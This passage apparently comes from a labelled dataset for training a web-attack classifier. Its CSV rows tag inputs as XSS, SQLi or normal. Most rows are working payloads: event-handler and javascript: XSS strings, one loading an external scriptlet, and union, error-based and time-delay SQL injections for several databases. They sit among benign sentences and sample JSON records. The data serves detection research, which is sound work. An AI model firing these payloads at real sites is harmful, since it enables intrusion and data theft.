onerror=""javascript:javascript:alert(1)"">",1,XSS,4210 "1"" ) where 5850 = 5850 or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12843 "-4452%"" union all select 7141,7141,7141,7141,7141,7141,7141,7141--",2,SQLi,16632 "Then, you'll need to select Download.",3,normal,25341 <a onpointerdown=alert(1)>XSS</a>,1,XSS,9336 "<noembed onmouseover=""alert(1)"">test</noembed>",1,XSS,6471 "{""id"":null,""name"":""Chansey""}",3,normal,26836 "1"" ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13770 1 ) where 2199 = 2199 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --,2,SQLi,15409 "1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) )",2,SQLi,13727 "1%"" ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( ""%"" = """,2,SQLi,10978 "<iframe onReadyStateChange iframe onReadyStateChange=""javascript:javascript:alert(1)""></iframe onReadyStateChange>",1,XSS,848 "-3460%"" ) ) ) or 9323 = 9323#",2,SQLi,20700 "<ins draggable=""true"" ondrag=""alert(1)"">test</ins>",1,XSS,5562 select ( case when ( 9030 = 9185 ) then 9030 else 9030* ( select 9030 from information_schema.character_sets ) end ) #,2,SQLi,13258 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#",2,SQLi,14333 select sleep ( 5 ) and ( ( ( 'iwwa' like 'iwwa,2,SQLi,18959 select ( case when ( 9619 = 8679 ) then 1 else 9619* ( select 9619 from master..sysdatabases ) end ) --,2,SQLi,13941 "<div id=""68""><doc xmlns:xlink=""http://www.w3.org/1999/xlink"" xmlns:html=""http://www.w3.org/1999/xhtml""> <html:style /><x xlink:href=""javascript:alert(68)"" xlink:type=""simple"">XXX</x></doc>//[""'`-->]]>]</div>",1,XSS,119 <rp onpointerleave=alert(1)>XSS</rp>,1,XSS,8840 ORDER BY 26,2,SQLi,22384 Select downgrade.,3,normal,24621 "1"" ) as advz where 5166 = 5166 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14067 <rtc onpointerdown=alert(1)>XSS</rtc>,1,XSS,8662 I need to decide where to go for a nature hike.,3,normal,23915 "1' ) as ildf where 5545 = 5545 union all select null,null,null,null#",2,SQLi,16413 "&lt;IMG LOWSRC=\""javascript&#058;alert('XSS')\""&gt;",1,XSS,5344 <td onpointermove=alert(1)>XSS</td>,1,XSS,9114 1' ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,10811 "<dialog draggable=""true"" ondrag=""alert(1)"">test</dialog>",1,XSS,4326 "1%"" and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,17471 "<figcaption draggable=""true"" ondragleave=""alert(1)"">test</figcaption>",1,XSS,2592 Select your career.,3,normal,24860 "1 ) and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and ( 4666 = 4666",2,SQLi,13070 Pete Najarian had his eye the Energy Select Sector SPDR ETF.,3,normal,25785 "-6220' union all select 1462,1462#",2,SQLi,20143 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ( ( '%' = '",2,SQLi,13942 "-1000"" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ""isbq"" = ""isbq",2,SQLi,10613 1' and sleep ( 5 ) and 'pfgy' = 'pfgy,2,SQLi,19925 Where's your SQL support?,3,normal,23412 "1' ) as ssez where 5351 = 5351 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11637 "<img\x11src=x onerror=""javascript:alert(1)"">",1,XSS,6770 <label id=x tabindex=1 onfocusin=alert(1)></label>,1,XSS,5624 "<style>@keyframes x{}</style><font style=""animation-name:x"" onanimationstart=""alert(1)""></font>",1,XSS,1607 "1%' ) and make_set ( 8403 = 8403,8899 ) and ( '%' = '",2,SQLi,18141 Congratulations to our very own @JulienMid and their @Value247 for being selected on Team @Yassuo for the now upcoming Legends League... of Legends Twitch Rivals!... Will Value secure the three - peat? And Will Julien pick up again his first WWE championship? Find him out the next damn week!...,3,normal,26510 Jessi drew out the inevitable by taking her time to select her food.,3,normal,25939 "<IMG SRC=x onpaste=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3814 "select * from generate_series ( 7667,7667,case when ( 7667 = 8232 ) then 1 else 0 end ) limit 1--",2,SQLi,14301 1 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,17284 "-5014"" ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ""dkyp"" like ""dkyp",2,SQLi,10578 1' ) ) as cmll where 7948 = 7948 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,10191 "<video id=x controls onfocus=alert(1)><source src=""validvideo.mp4"" type=video/mp4></video>",1,XSS,1763 "select * from users where id = 1 or 1#""; union select 'a',version ( ) -- 1",2,SQLi,15703 "1"" and 9468 = 7105--",2,SQLi,21816 "1%"" and elt ( 5345 = 8751,8751 ) and ""%"" = """,2,SQLi,19147 <wbr id=x tabindex=1 ondeactivate=alert(1)></wbr><input id=y autofocus>,1,XSS,2474 "select * from users where id = 1 or 1#"". union select 1,version ( ) -- 1",2,SQLi,15937 <article onpointermove=alert(1)>XSS</article>,1,XSS,6741 Determine values where valid.,3,normal,23317 "-4635"" union all select 5087,5087,5087,5087,5087,5087,5087,5087,5087,5087#",2,SQLi,15752 "1 ) ) as rsnb where 3168 = 3168 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,12223 "<sup oncontextmenu=""alert(1)"">test</sup>",1,XSS,7946 "1"" where 5216 = 5216 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12934 "1' or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and 'bkcs' = 'bkcs",2,SQLi,14393 He is vice chairman of the Senate Select Committee on Intelligence.,3,normal,26120 "1"" ) as ivuv where 5691 = 5691",2,SQLi,20616 "<shadow oncontextmenu=""alert(1)"">test</shadow>",1,XSS,6373 PARIS (Reuters) - Canada is set to select Airbus Group (AIR.,3,normal,25794 "1' ) where 5799 = 5799 union all select null,null,null,null,null--",2,SQLi,16640 <video onpointerup=alert(1)>XSS</video>,1,XSS,8261 "<details onclick=""alert(1)"">test</details>",1,XSS,7564 [XSS](.alert(1);),1,XSS,9798 "<ol oncopy=""alert(1)"" contenteditable>test</ol>",1,XSS,6170 "1 ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( 3003 = 3003",2,SQLi,11499 "<event-source src=""%(event)s"" onload=""javascript:alert(1)"">",1,XSS,3598 "<section onmouseover=""alert(1)"">test</section>",1,XSS,6290 `'><script>\xE534\xA0\x8Ejavascript:alert(534)</script>,1,XSS,4634 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#",2,SQLi,15171 "1%' ) ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,16533 Select the next book for our book club.,3,normal,24067 "<dl oncopy=""alert(1)"" contenteditable>test</dl>",1,XSS,6231 if ( 6624 = 4232 ) select 6624 else drop function xyyt--,2,SQLi,17704 1' ) ) waitfor delay '0:0:5' and ( ( 'jcfe' = 'jcfe,2,SQLi,18384 "{""id"":null,""firstName"":""James"",""lastName"":""Poh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26923 "{""id"":null,""name"":""Snover""}",3,normal,26868 1'|| ( select 'rjun' where 8868 = 8868 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) ) ||',2,SQLi,10291 "1"" and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ""hvwv"" = ""hvwv",2,SQLi,12796 "<dfn oncopy=""alert(1)"" contenteditable>test</dfn>",1,XSS,5752 "<head ondblclick=""alert(1)"">test</head>",1,XSS,8155 "1"" or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 )",2,SQLi,13527 "<summary draggable=""true"" ondragstart=""alert(1)"">test</summary>",1,XSS,3088 "<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>",1,XSS,1908 "<embed oncontextmenu=""alert(1)"">test</embed>",1,XSS,6885 "{""id"":null,""firstName"":""Eddy"",""lastName"":""Ham"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27601 <embed onpointerdown=alert(1)>XSS</embed>,1,XSS,7676 "-5643' ) ) union all select 1515,1515#",2,SQLi,19753 "<main ondblclick=""alert(1)"">test</main>",1,XSS,8175 "{""id"":null,""firstName"":""Brandon"",""lastName"":""Cai"",""address"":""1925 E MAIN ST, ALBEMARLE NC 28001"",""city"":""853"",""telephone"":""1837956512""}",3,normal,26846 "<dl draggable=""true"" ondrag=""alert(1)"">test</dl>",1,XSS,5872 Select the perfect gift for your friend's birthday.,3,normal,22932 "1%"" ) ) ) and 7758 = 4792 and ( ( ( ""%"" = """,2,SQLi,19205 "1"" ) where 2473 = 2473 and make_set ( 6118 = 7684,7684 ) --",2,SQLi,17326 select * from users where id = 1 or !<@ or 1 = 1 -- 1,2,SQLi,18054 "<time draggable=""true"" ondrag=""alert(1)"">test</time>",1,XSS,5124 "<base onkeyup=""alert(1)"" contenteditable>test</base>",1,XSS,5128 1'+ ( select 'tmel' where 2655 = 2655 rlike ( select ( case when ( 2118 = 8500 ) then 1 else 0x28 end ) ) ) +',2,SQLi,13647 "1%' ) and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,15058 "<nobr draggable=""true"" ondragend=""alert(1)"">test</nobr>",1,XSS,4623 <image3 onpointerenter=alert(1)>XSS</image3>,1,XSS,6812 "1' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 'gtov' like 'gtov",2,SQLi,16772 "1%"" ) ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( ( ""%"" = """,2,SQLi,15769 "1' ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'wgbh' = 'wgbh",2,SQLi,11503 <output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus>,1,XSS,2127 "<col onmouseenter=""alert(1)"">test</col>",1,XSS,8153 <col onpointerdown=alert(1)>XSS</col>,1,XSS,8720 "1%' ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( '%' = '",2,SQLi,13037 "0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//"";alert(String.fromCharCode?(88,83,83))//\"";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>"">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search",1,XSS,57 1'|| ( select 'lmsc' from dual where 1162 = 1162 order by 1--,2,SQLi,17046 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><u id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></u>",1,XSS,304 (select top 1,2,SQLi,22227 "1%' or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17684 "select * from users where id = 1 ||1 union select null,banner from v$version where rownum = 1 -- 1",2,SQLi,14202 select ( case when ( 4774 = 1535 ) then 4774 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13592 "<img src=""blah""onmouseover=""document.vulnerable=true;"">",1,XSS,4434 1'+ ( select zpdf where 2938 = 2938,2,SQLi,20052 "1"" ) as lvbm where 8179 = 8179",2,SQLi,20553 -9024 ) where 1686 = 1686 or 3069 = 8213--,2,SQLi,19286 "1"" ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""oyfz"" = ""oyfz",2,SQLi,12418 Create a lasting memory with your loved ones.,3,normal,22919 1' in boolean mode ) and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) #,2,SQLi,10502 "1%"" ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ""%"" = """,2,SQLi,10477 <figcaption onpointerenter=alert(1)>XSS</figcaption>,1,XSS,5242 Plant a cherry tree.,3,normal,22616 1' ) ) as txxn where 7884 = 7884 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --,2,SQLi,10512 Determine conditions where applicable.,3,normal,23363 Where's the psychiatrist's office?,3,normal,23666 "1"" where 4183 = 4183 union all select null,null,null,null,null,null--",2,SQLi,16306 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and '%' = '",2,SQLi,14148 "Amazon Pantry, however, is only available to users in select regions.",3,normal,26381 -3462' ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( 'cxku' like 'cxku,2,SQLi,10184 1 ) as qgsb where 7600 = 7600 and 2006 = 2006,2,SQLi,19001 1'|| ( select 'svnn' from dual where 8710 = 8710,2,SQLi,18801 -8301' ) ) ) or ( 5708 = 5268 ) *5268 and ( ( ( 'hkha' = 'hkha,2,SQLi,16931 <div id=x tabindex=1 onfocusin=alert(1)></div>,1,XSS,6378 <button onpointerenter=alert(1)>XSS</button>,1,XSS,6984 "1'+ ( select 'lawc' where 1171 = 1171 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13740 Delete app.,3,normal,23103 "<image onbeforecut=""alert(1)"" contenteditable>test</image>",1,XSS,3902 "{""id"":null,""firstName"":""Edmond"",""lastName"":""Tan"",""address"":""33 Lewis Rd #46"",""city"":""486"",""telephone"":""4152050977""}",3,normal,27134 "1' ) where 7561 = 7561 and 8514 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,12915 1 where 7882 = 7882,2,SQLi,22000 "1"" ) where 9093 = 9093",2,SQLi,21539 Randomly select a wedding song.,3,normal,24382 Select a theme for the party.,3,normal,23996 "1"" ) ) as vxkn where 2443 = 2443 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11338 interval,3,normal,23203 "-8021' ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( 'cenk' like 'cenk",2,SQLi,10185 1 ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,17079 GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;,1,XSS,4190 "<style>:target {transform: rotate(180deg);}</style><dir id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></dir>",1,XSS,668 "<img STYLE=""xss:expr/*XSS*/ession(document.vulnerable=true)"">",1,XSS,3268 -6588' where 7793 = 7793 or ( 8459 = 8459 ) *4906--,2,SQLi,18295 <svg><applet onload=alert(1)></applet>,1,XSS,8475 "=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,9915 "1%"" ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""%"" = """,2,SQLi,12671 Subcontracting firms are not able to select for final firm.,3,normal,25519 Select the ideal location for the event.,3,normal,24113 or 'a'='a,2,SQLi,22450 "1"" ) as evoq where 8193 = 8193 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11661 "</ foo=""><script>javascript:alert(1)</script>"">",1,XSS,6092 "<rt oncopy=""alert(1)"" contenteditable>test</rt>",1,XSS,6240 "-6440 ) ) ) union all select 3316,3316,3316,3316,3316,3316,3316,3316,3316,3316--",2,SQLi,15207 "<menu oncontextmenu=""alert(1)"">test</menu>",1,XSS,7353 Select a technique for painting.,3,normal,24256 "-6534%' ) ) or make_set ( 4107 = 9457,9457 ) and ( ( '%' = '",2,SQLi,17168 <x contenteditable onfocus=alert(1)>focus this!,1,XSS,6256 "-8698"" where 1990 = 1990 or ( 8459 = 8459 ) *4906--",2,SQLi,18314 "1"" ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ""lide"" = ""lide",2,SQLi,12258 "1 ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12039 "<LAYER SRC=""javascript:document.vulnerable=true;""></LAYER>",1,XSS,3820 "<img[a][b][c]src[d]=x[e]onerror=[f]""alert(1)"">",1,XSS,6271 "<spacer onkeyup=""alert(1)"" contenteditable>test</spacer>",1,XSS,4302 <center id=x tabindex=1 onfocus=alert(1)></center>,1,XSS,5571 "1, ( select ( case when ( 5217 = 5217 ) then 1 else 5217* ( select 5217 from mysql.db ) end ) )",2,SQLi,14412 "<html onmousedown=""alert(1)"">test</html>",1,XSS,7944 "<area draggable=""true"" ondragleave=""alert(1)"">test</area>",1,XSS,4166 or SLEEP(5),2,SQLi,22389 "-7007 ) union all select 6704,6704--",2,SQLi,19987 select pg_sleep ( 5 ) and 'qfaz' like 'qfaz,2,SQLi,19240 "1"" where 8732 = 8732",2,SQLi,21864 1'+ ( select 'jaok' where 2592 = 2592,2,SQLi,19880 Update your phone contacts.,3,normal,22753 "-1097"" where 4421 = 4421 union all select 4421,4421,4421,4421,4421#",2,SQLi,16545 \xE2\x81\x9Fjavascript:javascript:confirm(1),1,XSS,7046 "<map draggable=""true"" ondragend=""alert(1)"">test</map>",1,XSS,4894 1%' ) ) and ( 8853 = 9924 ) *9924 and ( ( '%' = ',2,SQLi,18588 "1' ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( 'ylit' like 'ylit",2,SQLi,10344 Select a class to learn something new.,3,normal,24156 "-3964"" ) where 3566 = 3566 order by 1--",2,SQLi,19585 "<script src=""data:text/javascript,alert(1)""></script>",1,XSS,4856 <xss onbeforescriptexecute=alert(1)><script>1</script>,1,XSS,4639 "1"" ) where 6903 = 6903",2,SQLi,21530 "<a onclick=""alert(1)"">test</a>",1,XSS,9553 Select a meditation technique to try.,3,normal,24074 """)) waitfor delay '0:0:20' /*",2,SQLi,20672 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7",2,SQLi,17739 "1' ) as hlbq where 2347 = 2347 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10233 Where's your SQL task?,3,normal,23428 "Instead, agencies encourage birth parents to select the families with which they want their child to be placed.",3,normal,25985 <dt id=x tabindex=1 onfocusin=alert(1)></dt>,1,XSS,6944 "<header onclick=""alert(1)"">test</header>",1,XSS,8020 Create a striking artwork.,3,normal,22667 <script>\u{61}lert(1)</script>,1,XSS,9524 <header onpointerleave=alert(1)>XSS</header>,1,XSS,6952 "<center onmousemove=""alert(1)"">test</center>",1,XSS,6884 1'|| ( select 'gnil' from dual where 7552 = 7552 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) ) ||',2,SQLi,13075 select ( case when ( 2576 = 7563 ) then 2576 else 1/ ( select 0 ) end ) --,2,SQLi,15805 %' AND 8310=8310 AND '%'=',2,SQLi,20944 "<footer oncut=""alert(1)"" contenteditable>test</footer>",1,XSS,4675 "1 ) ) as bgdm where 3473 = 3473 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,12197 <tr id=x tabindex=1 onfocusin=alert(1)></tr>,1,XSS,6999 "<div draggable=""true"" contenteditable>drag me</div><ul ondragover=alert(1) contenteditable>drop here</ul>",1,XSS,1254 "1' ) where 5883 = 5883 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11494 "1 ) where 4768 = 4768 union all select null,null,null,null,null,null,null,null#",2,SQLi,15278 1'|| ( select 'gdzt' where 4950 = 4950,2,SQLi,19782 1%' ) ) ) and sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,19222 "1"" union all select null#",2,SQLi,21133 Insert the new batteries into the device.,3,normal,22970 1'|| ( select 'tisi' from dual where 1616 = 1616 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) ) ||',2,SQLi,10064 "<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>",1,XSS,4860 Please select a date.,3,normal,24327 "<dd onmouseleave=""alert(1)"">test</dd>",1,XSS,8583 <ins onpointerenter=alert(1)>XSS</ins>,1,XSS,8430 "1' ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17485 "-5478"" ) where 4100 = 4100 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,10200 "<tbody onkeydown=""alert(1)"" contenteditable>test</tbody>",1,XSS,4365 "1 ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( 8024 = 8024",2,SQLi,17178 "1"" and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ""jgcv"" = ""jgcv",2,SQLi,10381 "Tick the box in the top toolbar to select all of the emails in your first page, or select individual emails by checking the boxes next to each message. 2.",3,normal,25291 "-3501"" ) ) ) or ( 6789 = 6990 ) *6990 and ( ( ( ""jnnc"" like ""jnnc",2,SQLi,16657 select ( case when ( 9246 = 6326 ) then 9246 else 9246* ( select 9246 from mysql.db ) end ) #,2,SQLi,14513 Females can’t use them to select mates.,3,normal,26201 "<strike ondblclick=""alert(1)"">test</strike>",1,XSS,7242 "1' ) as ohnu where 4097 = 4097 union all select null,null,null,null,null,null,null,null,null--",2,SQLi,14454 <svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//,1,XSS,3421 1%' and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and '%' = ',2,SQLi,10039 "{""id"":null,""firstName"":""Haziq"",""lastName"":""Subari"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27083 "<rb draggable=""true"" ondragstart=""alert(1)"">test</rb>",1,XSS,4978 "<del draggable=""true"" ondragleave=""alert(1)"">test</del>",1,XSS,4546 1%' and 2006 = 2006,2,SQLi,21980 She'll select her bouquet.,3,normal,24365 "AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))",2,SQLi,17124 "-2448%"" ) or 3038 = 3038",2,SQLi,21195 "-8166"" ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( ( ""lcqb"" = ""lcqb",2,SQLi,12362 <element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus>,1,XSS,2050 "<ul draggable=""true"" ondrag=""alert(1)"">test</ul>",1,XSS,5999 Select chair.,3,normal,23026 I wonder where my favorite book went.,3,normal,23671 "),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,15468 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",2,SQLi,13480 "-7868"" union all select 1805--",2,SQLi,20588 "<dir onbeforecut=""alert(1)"" contenteditable>test</dir>",1,XSS,4811 "1' ) ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( 'wzdo' = 'wzdo",2,SQLi,10940 "<frame draggable=""true"" ondragleave=""alert(1)"">test</frame>",1,XSS,3638 Where's the houseboat?,3,normal,23566 Where's the hot spring?,3,normal,23616 "select * from users where id = 1 or 1#""? or 1 = 1 -- 1",2,SQLi,17868 1' ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( 'zqiw' = 'zqiw,2,SQLi,15130 "<td onpaste=""alert(1)"" contenteditable>test</td>",1,XSS,5991 x000003C,1,XSS,9863 declare @s varchar(200) select 